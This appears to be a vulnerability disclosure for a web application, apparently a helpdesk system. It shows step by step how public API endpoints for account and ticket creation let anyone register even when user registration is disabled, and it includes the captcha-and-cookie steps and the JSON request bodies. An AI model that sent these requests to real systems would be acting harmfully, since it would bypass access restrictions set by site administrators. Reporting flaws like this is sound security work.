Register users in spite of Allow User Registration disabled

Main / Register users in spite of Allow User Registration disabled

Discription

# Description
Attacker can register a user in spite of the `Allow User Registration` is disable by default.

# Proof of Concept
1. Go to `/captcha`, get the captcha value and cookie.
![alt text](https://i.imgur.com/Fwa3jEw.png “Step 1”)
2. Send POST request to (/api/v1/public/account/create) with the value of captcha and cookie in step 1.
`//POST HOST/api/v1/public/account/create`
“`
{
“user”: {
“fullname”: “uname”,
“email”: “[email protected]”,
“password”: “passwd”
},
“captcha”: “captcha”
}
“`
![alt text](https://i.imgur.com/Uk0LSsr.png “Step 2”)
3. Register successfuly.
# Note
Same POC with endpoint `Create New Ticket`(/api/v1/public/tickets/create)
“`
{“user”:{“fullname”:”tpa tpa2″,”email”:”[email protected]”},”ticket”:{“subject”:”123″,”issue”:”123″},”captcha”:”Dazr”}
“`

References

Back to Main

Subscribe for the latest news: